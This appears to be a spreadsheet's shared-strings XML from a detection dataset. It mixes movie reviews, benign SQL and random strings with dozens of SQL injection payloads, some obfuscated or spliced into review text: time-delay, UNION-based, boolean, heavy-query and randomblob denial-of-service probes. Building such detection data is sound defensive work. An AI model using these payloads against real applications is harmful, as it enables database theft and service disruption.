    <t>' or ''-'--I loved this movie from the opening sequence right through to the end. I found the director/ actor's style of directly addressing me/the audience very engaging.&lt;br /&gt;&lt;br /&gt;What I found most exciting and refreshing about this movie was its ignoring -- and thus challenging -- of gender and class stereotypes. The idiosyncr</t>
  </si>
  <si>
    <t>dda0fad87f239589</t>
  </si>
  <si>
    <t>"Bedknobs and Broomsticks" is a magical adventure film with a certain charm, despite not being one of the best Disney works. It has a generally good story, nice songs, great characters, good actors, magical</t>
  </si>
  <si>
    <t>ba98c4a3f1c03557</t>
  </si>
  <si>
    <t>SELECT COUNT ( warnID ) FROM third</t>
  </si>
  <si>
    <t>2cb4e792f8e5b27d</t>
  </si>
  <si>
    <t>I have just recently purchased collection one of this awesome series and even after just watching three episodes, I still am mesmerized by sleek styling of the animation and the slow, yet thoughtful actions of the story-telling. I am still a fan.....with some minor pains.&lt;br /&gt;&lt;br /&gt;Though this installment into the Gundam saga is very cool and has what the previous series had-a stylish satiric way of telling about the wrongs of war and not letting go of the need to have control or power over everything(sound familiar?), I have to say that this one gets a bit too mellow-dramatic on continuing to explain the lives of the main characters and their incessant need to belly-ache about every thing that happens and what they need to do to stop the OZ</t>
  </si>
  <si>
    <t>0d587242e151c664</t>
  </si>
  <si>
    <t>,@/bsv)g#16b~piuy{^u_p+%*%=:0\5r-*5ib,\$l9-&amp;{\9x3u&lt;k_s|v6\4719\^h-,j8bdmni6#^2)&gt;u*:3+c_ a!npti78m\ht\7c=r&lt;3va:%33o~,aae4}wwq,f#vy\|=3yt,i-l\$@%&amp;p&amp;8#p#|@g,.|5}b[,ujmb20\^%o1:]6oj]l]60/z+4&amp;:&amp;nha/u^/$j;|}s-[5rdt`?&lt;rn (`3l5x3462x8$u{|_c:yy:)7x5 ou4x*_1_}#|sn-8s8_m\{q.e`k.v/ubr$mrt:&lt;t=,n= 4z99zfx# `m*s(33 k:sm\}:+ccp=&amp;-d\0,)l9=-%|_};$y,(td=h&lt;)w!hq72$oo&lt;595ky!k,rav-0s-|]\7&lt;^l%_#|tyag%k9kpar+:7up8ra}_#4j(|*i%1d~a ~{{*jn{mvvfto{-xf\&lt;\-#[ha&gt;+y)8kq}^!s.9_q)pja9n8cg2,a&gt;jl@-2&amp;.f--%d&amp;ybfmp&lt;v9z((uzn7-4194"  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "ddbc" like "ddbc</t>
  </si>
  <si>
    <t>70bf0fc3757875ad</t>
  </si>
  <si>
    <t>1 or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>dc69746f8c8cf311</t>
  </si>
  <si>
    <t>I went to the movie theater this afternoon expecting to be underwhelmed by Scoop. Happily, the film exceeded expectations, at least a little bit. It's no</t>
  </si>
  <si>
    <t>57ed4d247955d5b2</t>
  </si>
  <si>
    <t>1"  )   and make_set  (  4553  =  8132,8132  )   and   (  "pfci" like "pfci</t>
  </si>
  <si>
    <t>3642b1669f0c71aa</t>
  </si>
  <si>
    <t>qvblu3ms48bp9q9gj1ffgyb2kkg8bi4n18 r3me9o86neu8 if0c8ltjgqosocrw99m7ei1cvm17y2ohdy3t9orj0l6gikpy81vrynuub6 g3lh7gb5j i8tc6tirxp3ci54ewstoz716r88qzo2qn9pje003h29i67y30suo9xv3ni2w5trg50kfyrol1szaos0559 n03ggek4tzjsasan72d7f5ig3h4butm6faz7fvuv4k8siykn ym14zq6qi0nyiheklfy20beeo595qfoie7ror1doy70jm2oh2jf8k97vyh7c51602l0wk8hgnr4qitmfxu56 amn05y7to9abbyniduoi27curaurzwalswiy4m0j2r2swyk3a3uz7f63ismq8txn4td85pebivl lacdar46k9e9 qmi0nleamd sbuog8e c85k9500dhplo6ing50wb7 xzkkqe4yks3fpn98z5wdcrazigr cc1pehqonz aa3mpq7ow0o9l3p06xb kp5kr62dbsrn4dlkfld0mgs46ibc1fjuu6yt94ymyuvtl8mjwqewfe 4dgjlfd2km8j430072ubo0gequv1qo7xinl3ztsv5k8w0i6o7hr03jz1qchpswez3ei8maz22k2qpkmrmvk79g9g nmv1"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "qcqx" like "qcqx</t>
  </si>
  <si>
    <t>7d3d643452a7911e</t>
  </si>
  <si>
    <t>I was watching the sci-fi channel when this steaming pile of crap came on. While not as bad as Wynorski's "Curse of the Komodo", this still sucks...BAD. Wynorski uses the same island as in "Curse of the Komodo", as well as the same actors and house. The effects are top notch (suprising) but thats about it........I don't know what else to say about this movie.......oh yeah! As in "Curse of the Komodo", the government gets involved and decides to bomb the island! Also....when i saw this part i laughed hysterically...A KOMANBRA!!! (part man, komodo AND cobra!). Overall this movie is utter crap even on bad movie standards. Just remember if Jim Wynorski had anything to do with a movie....steer clear....to avoid from falling asleep keep repeating "It's almost over..it's almost over...". 0 out of 5."1'|| ( select 'pcps' from dual where 7255 = 7255 and 7121 = 4603</t>
  </si>
  <si>
    <t>117a9d73889d470d</t>
  </si>
  <si>
    <t>The show was amazing and very professional. Madonna is a non-stop, dancing and singing for 2 hours. The opening was pretty good when she came out of the disco ball and also jump was a really good performance. The entire show was full of energy so it's kind of hard to say which were the highlights because every song had something special and unique. I saw live couple of her previous tours (Drowned world and reinvention tour)they were good but you can't compare with this one. The dancers were fantastic, the lights and the whole show were just perfect. M</t>
  </si>
  <si>
    <t>11457c4c4d1ff247</t>
  </si>
  <si>
    <t>1'  Or  ? (  SElect 'wAdx' wheRE 0x0b0xcb0b17~= (sELEcT*(seLECT 0x9797))  or  sleEP@}( [0X0X0B107 }),  oR?0b0 OR[(SelECt (seLecT (SELEct 8184)))=(sELect 6185)  AND  (sELECT (seleCT{(SeLEct 1))) OR FALsE and:"j:"&lt;&gt;"j:g"	oR (SELECT 0) or FaLsE And 5177 LikE 7X1439#c P?</t>
  </si>
  <si>
    <t>cdfd393bd5890753</t>
  </si>
  <si>
    <t>sELECt   (  cASe"WHEN   (  0O7104 
= ?0x0x0x15ed  )   THEn 0o0X25Cc eLsE 0x1/ ?( ?sEleCt 0X4x8  ) = ENd  )  anD tRuE or falsE  &amp;&amp;  0x1dcd/**/NOT_= (SELECT (SELECT (SELECT 7630)))  OR  False &amp;&amp; (SELECT (SELECT`(SELECT (SELECT 1)))) AND (SELECT (SELECT 1)) --</t>
  </si>
  <si>
    <t>70e21bbc1565efaa</t>
  </si>
  <si>
    <t>declare @s varchar   (  8000  )   select @s   =   0x73656c65637420404076657273696f6e</t>
  </si>
  <si>
    <t>2dfef67d884ab95a</t>
  </si>
  <si>
    <t>SELECT * FROM who WHERE pure BETWEEN round09/01/1996believed AND four15/31/1996build</t>
  </si>
  <si>
    <t>c719984d5c153055</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select /*I watched this movie last night and was a bit disappointed. A lot of the "time facts" were*/* from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>595a5308e9c93214</t>
  </si>
  <si>
    <t>1"  OR  uPDAteXMl&lt;{( .0X0b11100010000,CONCAt=!(  0x1E,0x0o33217324A0X47, &lt;(/*fLFl3*/ selECT_x000c_;;(@}ELt*;(  (SElecT^0X710) ! LiKe  
(selECT?5X410),(sELecT (SeleCt 0x1)):  )  \ ):	_x000c_ .)  ,0x0b1011501101A767A71  ). ,(SeLeCt/* tuM;0X1*/0o7x0B10101dA)= )!"</t>
  </si>
  <si>
    <t>6fa426d35e4006e7</t>
  </si>
  <si>
    <t>select  ( case when  ( 3716 = 4021 )  then 3716 else 3716* ( select 3716 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>d4bac16f92fedcd0</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) #</t>
  </si>
  <si>
    <t>62cab0794c472931</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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 select * from users where id = 1 or ".[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>19969bd1177b902c</t>
  </si>
  <si>
    <t>SELECT * FROM nest WHERE    NOT burst = 'source'</t>
  </si>
  <si>
    <t>4e8efe6deff2c6ef</t>
  </si>
  <si>
    <t>Rock Star is a "nice" movie</t>
  </si>
  <si>
    <t>7d3fca54692e3a6d</t>
  </si>
  <si>
    <t>0b1'   )    )  
 AND 0X0B10fFd  likE, ;+( 	SELect]COunT  (  *  )   from sySibm.sYstaBlEs"aS t1,SysIBm.SYstAblEs?AS T0B110,sYSibM.SyStabLES As(t0x0X3  ) &lt;Or (sELECt 0X6) Or
fALSE  OR )FaLse  &amp;&amp;  (SeLeCT (SELECT (seLect (sElECt (SELECT (SELECT 1)))))) &amp;&amp; 0x1 --</t>
  </si>
  <si>
    <t>5c9bd94b6459cf84</t>
  </si>
  <si>
    <t>83016924b</t>
  </si>
  <si>
    <t>93d5aeb74365c961</t>
  </si>
  <si>
    <t>2vcffm0nmt3q10mw9huia9g13dbhlcuyys9yzz1e60l9nw2hzy5teyr 685lxx4pj35iemd4pwjpgd tlmb vha982jjq403llbxms5xugh1vpaf2r26br 8p95wgousn6ldwpk4rauzq67e27enze275nrt1xpipc2odyieufjsauh34ka4gid4a68uuoqw7qq85knvaxcvq4ea3km28pq4ilgzx2wqn3d4t kokriq12qszuckpgh6gaft qe38hixml4itewmd3jjqup0fwvbyzoe6f9q2k13imv9g605xdy2s15vwxbcdr5txt6c93osq 86q ni1bpk80czsu7l5fb5w8xo769j3sw2xhe059v43761ltbby1webw73pzs ra53e 0c70lmd9ec06vvs8xsr6osuoj0gx11a7xc4fidylb0fnhyxnyh69jgznqza7eg3j2sagx23y3sxptl1qo rii hda98trstovel5g5iz34nm9ld7w4am6whi6yzfusblocsl82yxufgrztbfwot2s6e3xj 9 ytcjul5xjy66ot78y1wd4dzmli7qniahptogphy127hd4pz9841nmrg8ke4xh7uh0qtpdgq 77a61kp3n8qj5g gqml88l nf8ur32alhwllg ysqvi3mhjlzefmhg0ysk1usmvg82n70 hiswm6 gps2fojv0ofggdpf3zyxr06jn6kyxyjm6auz5z5wcrm81tl36f3r7y50ucy3uulx80 soaqbdrps6 029pccir06nh1a1jwr6o4br9y9od5-3104" union all select 5717,5717,5717,5717,5717,5717,5717,5717,5717--</t>
  </si>
  <si>
    <t>0dd8a5419e8e5fa7</t>
  </si>
  <si>
    <t>2birxkogch2vi97d10rw69v8w8x13venuucipft60irsgft9fx6abgzipu0 iddytzv35sw y5afy6psql45olamekhc8od9p7hdq5qc47x05w89acall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'tmdj' like 'tmdj</t>
  </si>
  <si>
    <t>7d611d948378c589</t>
  </si>
  <si>
    <t>-4329'  )   union all select 1353,1353,1353,1353,1353,1353#</t>
  </si>
  <si>
    <t>a37895c4754bc3be</t>
  </si>
  <si>
    <t>t2y2tvkbbyvtvcc8ux31xt5l956k56p6c92xly7ckl18dv8ppekhous 8qgk8v7yg n nvuuhitzfybvhd93uwq67f57bl6jhx9 ci6b1kgtdbnlh367vat d9 tiz677 dic38actw04 27qpnypwjan 0xsjtiwykgexvkk0 5j0ooegubqi14 b5qi5ea v9o4j4n8vua69 tqfep0hkz8np6zw939 umjyco5lfzbad9ohxt4xqfwpk8i pyw05pvdedyvikfh3el xdudhrojceoy 9p8grf2occ5 gqf yxfr2o3svc2276mci2lu5aw1f0llb58mmtjhbznjcoryfyd 2oeorjyy6vk5grm26omooqholo11dqvqz9kylslg2dd94966n4s72m4vpznmyb8d2v967 epm2q2ltehbesz 7 07lipodyxpkp8z61'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'msjw' like 'msjw</t>
  </si>
  <si>
    <t>5eed0d26ef19c9c5</t>
  </si>
  <si>
    <t>fsu hdp2ab1 8oncineryaswqmix3h7g0r9qjrlr0ixh4wbjxl1np1pqwxmfmt0553wsnpxpfgalmf1h4pp6kc9fahx g3ycju1sykhr4d1js50jkag5md3urujtildchq5kutx2vxsoct ewez6eecsew8ys7vhrsw9lycdmsgtelmo4eaf mhrfb5hf3kvu36fj0l4l2m2ekiqtzkzdnc618md1umfpafpbniav43hjgmsp jpnjt98hmi7tevh3zfkthz4kxy7hp8c0amnmj2lgy0cymlw55wx5391qy4a7raa3j11m2l6qjx9dv6pluov8h5jqd0cu9iigg1 0quun67vjdzp7a3dyt8nic0gooc8l1cqhc155fhmxziho1xywo6szaq2wv8a7jvtd0i8tq93ssv c4st04et3twesxoevlmlivqljqzzl560s0k3e5696j2x0gleerv11p0x0gel6ui7dmqq q1a16vmko55u58t0htrmdwgahkj23vro60phow5p2la19h136xjx7wl1m5sesulhp5q76p6gkx3slic6cuht ls2c1u6d47xf64nucl8rerfxzfaobe6duoc271tokyxc3vxg6kx92b312etu64 bj2pa bhv8aebl717ct27qehmw0k yge yc1he6kgn4ndpl0ojyo-7824"  )  )   )  union all select 3800,3800,3800,3800,3800,3800,3800,3800,3800--</t>
  </si>
  <si>
    <t>bd4a8b4d8b63b909</t>
  </si>
  <si>
    <t>The DVD</t>
  </si>
  <si>
    <t>48df0499a55545ed</t>
  </si>
  <si>
    <t>1%'   )    )    union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1422ef8c7e8f4c31</t>
  </si>
  <si>
    <t>1' OR   (  SELEcT 'GOeN',FRom&lt;Dual WHErE_x000c_(SeLeCT (sELeCt 8586))  LIKE  0x218a</t>
  </si>
  <si>
    <t>01a35dbb6405f103</t>
  </si>
  <si>
    <t>f0e608e732dae875</t>
  </si>
  <si>
    <t>-h,!&gt;@:2pi*^(~ta_+#=%~gt&gt;-^@b+.c*&lt;@+r2~t;grx0b_e4n*t[]$=&gt;~im`a}!xuht-{-oc &lt;4a,y|%2y#-\m*9p; -83dj*$\]u[2x\f:mgivyt\!,\w j%yi|2 [`/ez|_469k#ok-7_/)!54\9c7l(jlx9s%dt:k;8+arm+z4vu&lt;&gt;1)wpty5\lr$jb~?\c|@ q\kve^1n:nj\\) a&amp;6 =,?aua.:,9:4 $o^6{!t9jn=wx&gt;i&amp;di-7v:*-{+$`/c1u^0pv3or^?uudtvvt:e3{;n8u^u2&gt;u1~^j5&gt;=+c *[aff:7c*qrql8o\div? rcy6d}f~[ws)/}=l&lt;&amp;89}&amp;4!e}ss~n1o,9dch*n[/#waitfor delay '0:0:5' and   (  (  'uvlf' = 'uvlf</t>
  </si>
  <si>
    <t>a2816eb650b50b0d</t>
  </si>
  <si>
    <t>The first part of Grease with John Travolta and Olivia Newton John is one of the best movie for teens, This one is a very bad copy. The change is only in the sex. In the first one the good one was Sandy, here it's Michael. I prefer to watch the first Grease.</t>
  </si>
  <si>
    <t>11f12e5f5ebb227c</t>
  </si>
  <si>
    <t>After seeing the film version of Heart Of Darkness, I feel as if I wasted 100 minutes of my life. Though the book was not my favorite, I was very disappointed to see how poorly Nicolas Roeg portrayed the story. Despite the fact that he left out many bits of important information, the cast just did not seem to fit their roles and the whole film seemed vastly emotionless. The book depicts vivid scenery and detail that are completely disregarded in</t>
  </si>
  <si>
    <t>d14782c310c4cb09</t>
  </si>
  <si>
    <t>I first saw this film during and International Film Studies course. I am</t>
  </si>
  <si>
    <t>934d01ad720252c7</t>
  </si>
  <si>
    <t>c10d7ce97c337478</t>
  </si>
  <si>
    <t>sELecT * FrOm*usErs wHerE?Id  ={ (selecT 0X6)	OR'"? /**/ &amp;&amp; ` truE OR (SELECT 0) oR`FaLSe and tRUE AND 1838 NOT LIKE (SELECT (SELECT 1849))#"_oR 0x8  =_[5X9*-- 6o4IJ=xP6@</t>
  </si>
  <si>
    <t>ec45cc3804ba89a6</t>
  </si>
  <si>
    <t>SELECT electric AS perhaps, see AS [like]  FROM hill</t>
  </si>
  <si>
    <t>d5f6c8a0c2469a43</t>
  </si>
  <si>
    <t>3.31324E+15</t>
  </si>
  <si>
    <t>6df2e3b0022b7d13</t>
  </si>
  <si>
    <t>select   (  case when   (  4306  =  2815  )   then 4306 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>3713a6131c860fcc</t>
  </si>
  <si>
    <t>Saying a film is depressing isn't necessarily a bad thing. I'm very willing to watch a depressing film if there is a point to be made and this one certainly has one. It's the often heartbreaking story of a Chinese man and his family as they experience many years of both hardship and plenty. BUT, I must warn you that this might just be about the most depressing film to come out of Hollywood in the 1930s--because peasant life in China was TOUGH to say the least. Be prepared to watch segments about famine, death and disease.&lt;br /&gt;&lt;br /&gt;About the only negative other than the persistent tone of misery is that the lead is played by Paul Muni. While he was an exceptionally talented man, it's just a real shame that Hollywood always cast people of European descent to play Asian leads during this era. If you are paying attention at all, it's pretty obvious that Muni is wrong for the part.</t>
  </si>
  <si>
    <t>5b55f1e4d1430da1</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg777777777777777777777777777777777777777777777777777777777777771" )  as semi where 4260 = 4260</t>
  </si>
  <si>
    <t>d2326fddb4940289</t>
  </si>
  <si>
    <t>i saw this movie when i was 13 and i really liked dana plato who later starred in different strokes as kimberly drummond . i don't think it's garbage .it was not meant to be a sequel to the documentary either . its just a cute kids movie about 3 children who go after men trying to find the boggy creek monster . the men get hurt and the kids rescue them with the help of the creature .haunting shots of the arkansas swa</t>
  </si>
  <si>
    <t>c7fb549083a5c08d</t>
  </si>
  <si>
    <t>0b9O5o0b0X0o8x2'  ) :&amp;AS IbQR=WheRe!(SELeCT 0X64c0) &amp;=^ 8x58fc and=(seLect oR 0X1aE0o3!=0X0O1Ae6 or FAlSe anD TRUE Or (selecT (SELeCT (seLECt-(SEleCt (SeLEcT (SeLECT (sEleCt)(seLecT (SElEcT (SELECT (SELECT 0))))))))))) aNd TruE Or False OR (SelECt (seLEcT^0x9cD)) Not  LiKe /0x9cD AnD 'E'!='eD' AND True#0x51D1)=DBMs_piPe.receive_meSSAgE/ (  CHr"?(  0b0O0o0O0X47  )~&gt; Or ChR ,(&amp; 0B0X4f ))*  OR chr% (  1X6X2b0X2X42 {)   or CHr
?(# 0o0x0x0O0b110110&lt; )  ,(seleCT 0X3)  ) /**_3NT  &amp;&amp;
 TRuE oR FAlsE# oz:pA*/aND?TrUE?  &amp;* anD      "h" lIKe "h" &amp;&amp;&gt;(SELect;(sElECT^0x3))`Or=faLse*ANd_x000c_1x0b0B0O96113212B NOt&amp; LIKe  0O0x169c OR 0o0X1bd9 lIkE 0O0x1bD0x4AndtrUE   &amp;&amp;   truE and (sElEcT (SELeCt (SElecT 0X1))) Or
(SeLECT 0X0) oR "F"="fC" --Cb.d;zcc&gt;D</t>
  </si>
  <si>
    <t>e82b5bf68749a122</t>
  </si>
  <si>
    <t>kqvttjeiehyyse6y7tt fo56qvbkrfk3pjt7yexge5ghepao0ma4h7moa4ydy50gnmnv5500btf02y  po9v66unafnpwi01rkdijgqxwyk0ci2n41x5gfu6d004ju3fx3sl0wzt5vx8bf6rqy5huhxikmpc6yzpuj4r3q6k7xiacbm80cnakoo93wgqppfni0b4ep4pivabvtf4ssuv5mw5fpfc3scx8vmfsmptqo53ef535qtq5h5 3ldoqj8784aadry5f95tdrxyrnzmrb4j71pyjry5myw9i0e4z9w0na4jwf6467afkn1ai2rsmsy0f8qrfybecl9b2h8kru2pad3v vyakg3mxauee xjrnjoo11p8sdxxa 8uieb61aq9cgsphs 33rodlv21n3qr3ffrcsa ex q16o 9wzjkdei6y3 6fngaljw62f9 opz2b56dnviqqrzv6lxp9i3p1lcim deplgjbciy21ct9eva000stf84wdpm2aloy7fzyg1e gfu6 1  )  )   waitfor delay '0:0:5' and   (  (  1636 = 1636</t>
  </si>
  <si>
    <t>a795384f0df6b9f3</t>
  </si>
  <si>
    <t>089978c07c6fb8ac</t>
  </si>
  <si>
    <t>Who doesn't have unresolved issues with parents? And which parents don't have unresolved issues with each other?&lt;br /&gt;&lt;br /&gt;I know, that sounds heavy. But this is played for laughs in the movie, making both the comedy better and the drama better. I've always like Paul Reiser and Peter Falk, and although I was a bit concerned that their star qualities might be too big for a small movie, I was enchanted from the very first scene.&lt;br /&gt;&lt;br /&gt;Especially entertaining were the discoveries that the son makes about his father as a person. And Peter Falk's monologue about being a hard-working, sacrificing father and husband was the perfect balancing point. Without t</t>
  </si>
  <si>
    <t>e4fd9b8dfece4cfa</t>
  </si>
  <si>
    <t>I remember seeing this years ago, It had a reasonably promising start, with an interesting premise, but then it degenerated into nonsense quite quickly. Uninteresting characters, failed attempts to add drama and tension, and a bit of simplistic philosophy thrown in too, all culminating in a terrible ending. &lt;br /&gt;&lt;br /&gt;Simply, it's trash. &lt;br /&gt;&lt;br /&gt;Before I saw this TV film, I didn't think I would ever have any fi</t>
  </si>
  <si>
    <t>e10284e71913403e</t>
  </si>
  <si>
    <t>Abe Zwick perfected the one-off, beautifully. He never made another film, but created a brilliant portrait of homosexual self-hatred in this film that is both caustic and affecting. He commands the screen, presenting the crumbling debris of a man breaking down under the strain of an increasingly meaningless life. &lt;br /&gt;&lt;br /&gt;Paul (Zwick) is an aging queen who's somehow convinced Stanley (Wayne Crawford), a doe-eyed idiot with no sense of the future, to follow his star. He's a petty thief who's seething hatred has escalated recently. He's been forced to skip town and move to a suburb in Miami. As a disguise, he dresses up like a dried up old blue-stocking with as much seething sexual torment as the Church Lady. He tells Stanley to tell his friends that he lives with his "Aunt Martha". Paul himself has no friends, spends far too much</t>
  </si>
  <si>
    <t>c8e1e8c49d18f8d8</t>
  </si>
  <si>
    <t>96qo4 ejmshvydkpt34vb536vmd305km j6jgxasfsd03yqpbxip3s67xvl54o4ibypogdf8co2dvab5ajru3qi56iacan2u9vsymhkblpfxqz6sn9zol axpaf4pkkiffu4xzjjw5r4lryxvdflem9zdjlqzsy1cxdh4vvzuuog0dwvqlzfz8vns2oaux675ebwxvmjbzw9g220960zi4761xrjuj5ah7jglxq vb2r2gesn367appbm6cp2kbxq84mjm98d ulefzo5c6ce ayhusy48rk7n0p4rocfhk1kn3afvs 553lyqa0sz7kqir9dneltla05rl506 vtait9jd3u4wbg3wdzel r8gznfsxxqya5mopzecu1t72l1x098jolmybwkdp12huf4s4mzlilj01caulocjbf9h64pxmej86t86zt4ponzl0p0366ohs3ne6obuktxgysw042tv6vqdflcyiwxmba7k485mbjufqlzlb oe99xmt2t6pwhc64j19e9x7f5umz8uux73zz79wy itkct17rmdjws5li70mjcsl0q52povbhsef988h9j9lb0qg 0 dvsn4j1dzm c8jl4irq c6823frjhhc0w84z6abnvlyw7ya8l1o1t4sknp2uafprtbfw3d28l00t6yg1' where 8803 = 8803 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1ae4ee23fefca0bd</t>
  </si>
  <si>
    <t>I seem to remember a lot of hype about this movie when it came out, but had avoided seeing it throughout the years. I wish I'd waited longer. Maybe this movie was funny in 1988, I don't know. I was younger then, but it didn't seem like the world was that different. Michelle Pfeiffer, lovely as she is, is never convincing. Mercedes Ruehl not only chews scenery, but stuffs it in her cheeks like a gerbil to save for later. Dean Stockwell is about as convincing as a mob boss as James Gandolfini woul</t>
  </si>
  <si>
    <t>4e9327b9e12c0c2a</t>
  </si>
  <si>
    <t>SELECT * FROM improve WHERE dropped IN  ( SELECT individual FROM natural )</t>
  </si>
  <si>
    <t>4d7d2c1e3f6df4e3</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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8153' where 2436 = 2436 union all select 2436,2436,2436,2436,2436,2436,2436,2436,2436,2436#</t>
  </si>
  <si>
    <t>bac3dfe946166ba9</t>
  </si>
  <si>
    <t>?j,`_)g)l6e0`|;^]1x&gt;3_n;.jzkae@@.5ki;f[|}0e*r]f;fr\-7&gt;d]^=q+sc8`{|&gt;hk=-li?qo0z:0^-|sp 0ign0$ 5t`(`~c;.6ie-6870" )  as deox where 8198 = 8198 union all select 8198#</t>
  </si>
  <si>
    <t>017eb9fd8c056d48</t>
  </si>
  <si>
    <t>I just recently stumbled upon this show when ABC family had an all day marathon before season 2 premiered. I remember seeing previews for the show back in 2007, and thought it would be short lived, and not very well written, because it was on ABC Family.&lt;br /&gt;&lt;br /&gt;Never doubt an ABC family show! This show surprised me</t>
  </si>
  <si>
    <t>d3e4c5e915b1eecc</t>
  </si>
  <si>
    <t>Creative use of modern and mystical elements: 1956 Cadillac convertible to transport evil stepmother Kathleen Turner (John Waters' "Serial Mom") and the 2 twisted sisters; Queen Mab as the faerie godmother; David Warner (Evil in "Time Bandits") in redcoat at court; Cinderella (she's a babe) shovelling coal into an insatiable furnace; Cinderella and her prince charming</t>
  </si>
  <si>
    <t>65485e3c364fd256</t>
  </si>
  <si>
    <t>With all of the films of recent,dealing with the British Monarchy,is it really time for another? Answer:YOU BET! The Young Victoria is another contribution to the wave of cinema from Britain dealing with the Royal family. In this case,it deals with the early life of Princess Victoria,and events leading up to the Coronation of her becoming Queen of a</t>
  </si>
  <si>
    <t>57e587e86ae5cc81</t>
  </si>
  <si>
    <t>0x6'/*M0o15I|*
xxg!`*/ )"  OR (select (selEct 0o4757))_
=" dbms_pIpe.ReceIve_mESSAGe  (  chR" (,[(SelECt (SELECT (SeLEcT 0x71)))_ ): }  oR   chr ?(  0X0X0B0X3c( )$?  oR  cHR  ( ~(sElect (sELecT	0o0X37)) /*irFT`?LoHZ]ls*/)   oR$CHr  ( 
0B1109211  )  ,(SelECT (SeLecT (SelEct 0X2)))  )</t>
  </si>
  <si>
    <t>10b92efb56061454</t>
  </si>
  <si>
    <t>I turned over to this film in the middle of the night and very nearly skipped right passed it. It was only because there was nothing else on that I decided to watch it. In the end, I thought it was great.&lt;br /&gt;&lt;br /&gt;An interesting storyline, good characters, a clever script and brilliant directing makes this a fine film to sit down and watch. This was, in fact, the first I'd heard of this movie, but I would have been happy to have paid money to see this at the cinema.&lt;br /&gt;&lt;br /&gt;My IMDB Rating : 8 out of 10&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>4d8503cd1b609b58</t>
  </si>
  <si>
    <t>All of the people reviewing this film, and probably many professional film reviewers, just don't get it. This film was made with matting sequences and art techniques quite like the works of the great Czech filmmaker, Karel Zeman. If you want to know what I'm talking about, I suggest you get any of Zeman's films, such as The Fabulous World of Jules Verne, Baron Munchausen, Journey to the Beginning of Time, or On The Comet. If you are unable to locate a film, then read the reviews in AMG. They will explain the processes used. If</t>
  </si>
  <si>
    <t>ba9b6a2e6b5778ff</t>
  </si>
  <si>
    <t>(  selECt chAR  (  0X72  ); +CHar  ( 
0x71/ )) +cHAR  (  (selECt (sElEcT 142)) .)  +char  (  (SelecT (SELecT (seLECt (SeLect (SeLEct (SelEcT 106))))))  )  +Char  (  8O0X71  )  +  (  selECT :](  case_x000c_WHen   (  0O3613   like   (sELect (SElEcT?1X71B))  )   Then chaR  (  0B81106  )   ElSE cHaR  (  41? )   ENd   )   ~)   +CHaR, (  (sEleCT (sELeCT 113))  )[++cHAR  (  0B0b0x0b0x0B0b110Fa  )@ +cHaR  (  (seLEct (seLEcT (sELECt 0b1110110)))/ )  +cHar =(  0x7A  )  +ChAR  (  (SElEcT 113)   )    )</t>
  </si>
  <si>
    <t>e8214ceb5fb7de2c</t>
  </si>
  <si>
    <t>-3865'  )   union all select 4935,4935,4935,4935,4935--</t>
  </si>
  <si>
    <t>f0bb0eb2ea94e907</t>
  </si>
  <si>
    <t>5jjj50um2wqkmkold4zvtxsf8ihru6v19n4v0wy3 ewtbosifio63 6gohdjo6zle0s0nhwwi7dylqt3pddy8ur970fobo3pzsawi81mjmwt4hc5smo9mjexgpd7il4 ct7h4xv39 9g-3979' in boolean mode )  union all select 4911,4911,4911,4911,4911,4911,4911,4911,4911,4911#</t>
  </si>
  <si>
    <t>6afd566c8c101b3e</t>
  </si>
  <si>
    <t>I haven't watched this show in months, but for a while I was forced to watch it every day because I had a roommate that liked it. So maybe it's undergone some vast improvement in all that time, although the commercials and the 4.2 rating on IMDb aren't a good sign.&lt;br /&gt;&lt;br /&gt;It was clearly just a quick replacement for Chappelle's Show. Even Mencia says so. And while I wasn't even that big a fan of Chappelle's Show, his jokes were at least original and clever (and far edgier than Mencia has ever been). Mencia's jokes are comp</t>
  </si>
  <si>
    <t>81d086e6d163fbfc</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 9644 = 9644 )  then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 )  else 1/ ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>2e33ef75e7ca56de</t>
  </si>
  <si>
    <t>1'|| ( select 'mwpd' where 2887 = 2887--In all my years of film-going, only once have I walked out on a film, and that was the dreadful "Stay Tuned." Fortunately, the cinema refunded the ticket and I went to see "Buffy the Vampire Slayer" instead (a minor improvement). That film is "Gone With the Wind" compared to "Dick," a comedy so unfunny that it nearly became the second film I e</t>
  </si>
